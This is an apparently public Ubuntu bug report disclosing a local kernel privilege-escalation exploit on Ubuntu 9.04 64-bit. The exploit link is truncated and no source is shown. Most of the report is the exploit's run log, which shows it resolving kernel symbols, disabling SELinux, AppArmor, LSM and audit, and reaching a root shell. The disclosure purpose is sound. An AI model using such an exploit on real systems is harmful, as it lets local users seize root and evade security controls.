Current version of kernel is vulnerable to privileges escalation exploit (Ring0 code execution and root rights)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Ubuntu |
New
|
Undecided
|
Unassigned |
Bug Description
Exploit can be found at http://
Tested on Ubuntu 9.04 64-bit.
$ uname -a
Linux ath64 2.6.28-15-generic #48-Ubuntu SMP Wed Jul 29 08:53:35 UTC 2009 x86_64 GNU/Linux
Exploit impact: allows local user to elevate his rights (ring0 and root).
Exploit requires compiler, etc to work.
That's how it looks on Ubuntu 9.04 64-bit with latest available kernel:
-------
$ ./wunderbar_
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xffffffff80b50908
[+] Resolved selinux_enabled to 0xffffffff80b50904
[+] Resolved apparmor_enabled to 0xffffffff808c1aa4
[+] Resolved apparmor_complain to 0xffffffff80b54024
[+] Resolved apparmor_audit to 0xffffffff80b5402c
[+] Resolved apparmor_logsyscall to 0xffffffff80b54030
[+] Resolved security_ops to 0xffffffff80b4e0a0
[+] Resolved default_
[+] Resolved sel_read_enforce to 0xffffffff803de100
[+] Resolved audit_enabled to 0xffffffff80b0d5c4
[+] got ring0!
[+] detected 2.6 style 4k stacks
MPlayer 1.0rc2-4.3.3 (C) 2000-2007 MPlayer Team
CPU: AMD Phenom(tm) II X4 810 Processor (Family: 16, Model: 4, Stepping: 2)
CPUflags: MMX: 1 MMX2: 1 3DNow: 1 3DNow2: 1 SSE: 1 SSE2: 1
Compiled with runtime CPU detection.
mplayer: could not connect to socket
mplayer: No such file or directory
Failed to open LIRC support. You will not be able to use your remote control.
Playing /tmp/video.kd9ejO.
AVI file format detected.
[aviheader] Video stream found, -vid 0
[aviheader] Audio stream found, -aid 1
VIDEO: [XVID] 472x240 32bpp 15.000 fps 150.6 kbps (18.4 kbyte/s)
[+] Disabled security of : LSM
[+] Got root!
#
-------
visibility: | private → public |